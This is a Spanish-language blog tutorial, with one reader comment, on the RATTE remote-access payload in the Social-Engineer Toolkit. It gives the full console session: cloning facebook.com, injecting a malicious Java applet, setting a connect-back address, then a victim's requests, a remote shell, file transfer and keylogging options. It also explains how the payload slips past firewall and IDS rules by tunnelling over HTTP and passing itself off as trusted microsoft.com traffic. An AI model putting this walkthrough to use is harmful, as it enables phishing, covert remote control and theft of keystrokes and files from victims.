Una de las ultimas características añadidas al framework de SET ha sido RATTE (Remote Administration Tool Tommy Edition) se trata de un payload que intenta evadir restricciones sobre el trafico saliente que pudieran existir en el segmento de red del objetivo, como por ejemplo un IDS o Firewall establecido en dicha red, este objetivo se consigue gracias a que todos los comandos que se ejecutan se realizan completamente por medio de una comunicación HTTP (tanto en el envío de la ejecución del comando como en el retorno de los resultados del mismo desde el cliente).
Otra característica importante y sumamente interesante de RATTE es que cuando se ejecuta sobre un navegador web como Firefox o IE, reemplaza algunas fracciones del código de dichos navegadores por código contenido en RATTE, de este modo cada vez que una víctima ejecute Firefox o IE estos contendrán pociones de RATTE en su ejecución interna. Finalmente, RATTE se basa en microsoft.com para identificar la ruta de salida de la red, ya que una petición a dicha ruta es catalogada como “confiable”.
Bien, después de indicar las características de RATTE (que no son pocas y que son realmente interesantes) se procede a indicar su uso desde SET.
Para utilizar este modulo se cuenta con dos opciones que conllevan al mismo destino, por un lado es posible utilizar este payload en un ataque web con un applet malicioso y por otro lado es posible utilizarlo desde la opción “Third Party Modules ” independiente del mecanismo elegido, el fin será exactamente el mismo.
Seleccionando Third Party Modules
Desde esta opción se procede a seleccionar un ataque con un applet de Java malicioso utilizando RATTE de la siguiente forma
set > 9 Welcome to the Social-Engineer Toolkit Third Party Modules menu. Please read the readme/modules.txt for more information on how to create your own modules. 1. RATTE (Remote Administration Tool Tommy Edition) Create Payload only. Read the readme/RATTE-Readme.txt first 2. RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) – Read the readme/RATTE_README.txt first 99. Return to the previous menu set > modules > 2 Enter website to clone (ex. https://gmail.com): http://www.facebook.com Enter your IP address to connect back on: 192.168.1.33 Enter port java applet should listen on (ex. 443): 443 Enter port RATTE Server should listen on (ex. 8080): [*] preparing RATTE… [*] Starting java applet attack… [*] Cloning the website: http://www.facebook.com [*] This could take a little bit… [*] Injecting Java Applet attack into the newly cloned website. [*] Filename obfuscation complete. Payload name is: 3FEryeX [*] Malicious java applet website prepped for deployment Site has been successfully cloned and is: reports/ [*] Starting ratteserver… Welcome to RATTE RATTE is published for education only! Use only with written permission of target! For more technical information and parts of source code check out chapter «B.2 Entwicklung eines Sicherheitspruefprogrammes» of «Die Kunst der digitalen Verteidigung» -> http://www.cul.de/verteidigung.html RATTE Server Menue 1) list clients 2) activate client 3) remove client 4) remove all clients 5) remove&delete Client 99) stop Server Choose: |
Posteriormente cuando una víctima selecciona ejecutar el applet, automaticamente la petición es tratada por RATTE
192.168.1.40 – – [14/Aug/2011 17:39:24] «GET / HTTP/1.1» 200 – 192.168.1.40 – – [14/Aug/2011 17:39:30] code 404, message File not found 192.168.1.40 – – [14/Aug/2011 17:39:35] «GET /favicon.ico HTTP/1.1» 404 – 192.168.1.40 – – [14/Aug/2011 17:39:40] «GET /Signed_Update.jar HTTP/1.1» 200 – 192.168.1.40 – – [14/Aug/2011 17:39:49] «GET /3FEryeX HTTP/1.1» 200 – 1 Warte auf Mutex Clients: 0) ID:1 HTTP connection from 192.168.1.40 using Ratte Connected at Sun Aug 14 17:40:02 2011 RATTE Server Menue 1) list clients 2) activate client 3) remove client 4) remove all clients 5) remove&delete Client 99) stop Server Choose: |
Como puede apreciarse, ahora desde la opción 1 (list clients) existe un cliente que se encuentra listo para ser tratado por RATTE con el identificador “1” ahora es necesario activar dicho cliente para disponer de los comandos existentes en RATTE
Choose: 2 Enter the session you want to interact with: send activation request, may take 10 seconds Client activated Session Menue 1) start Shell 2) get File from Client 3) send File to Client 4) get Keylog to ./keylog.txt 5) Change Shell User 6) List Processes 7) Kill Process 8) Client bits File Download 99) close Session |
Una vez el cliente ha sido activado, se enseña el menú de acciones disponibles en RATTE para ejecutar sobre la víctima. Por ejemplo:
Choose: 1 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Owner\Desktop> dir Volume in drive C has no label. Volume Serial Number is 689A-D74E Directory of C:\Documents and Settings\Owner\Desktop 23.07.2011 02:53 <DIR> . 23.07.2011 02:53 <DIR> .. 23.07.2011 02:53 834 Windows Media Player.lnk 1 File(s) 834 bytes 2 Dir(s) 11�238�354�944 bytes free exit 1) start Shell 2) get File from Client 3) send File to Client 4) get Keylog to ./keylog.txt 5) Change Shell User 6) List Processes 7) Kill Process 8) Client bits File Download 99) close Session Choose: |
Como puede apreciarse se puede establecer comunicación con la víctima realizando un “bypass” de las reglas del firewall para trafico saliente establecidas en el segmento de red de la víctima.
hola, no entiendo que ocurre pero se me crea un bucle en esta parte:
192.168.1.40 – – [14/Aug/2011 17:39:24] “GET / HTTP/1.1″ 200 –
192.168.1.40 – – [14/Aug/2011 17:39:30] code 404, message File not found
192.168.1.40 – – [14/Aug/2011 17:39:35] “GET /favicon.ico HTTP/1.1″ 404 –
192.168.1.40 – – [14/Aug/2011 17:39:40] “GET /Signed_Update.jar HTTP/1.1″ 200 –
192.168.1.40 – – [14/Aug/2011 17:39:49] “GET /3FEryeX HTTP/1.1″ 200 –
1
la fake page la carga bien pero no me abre sesion meterpreter… si tienes alguna idea…
Me gustaMe gusta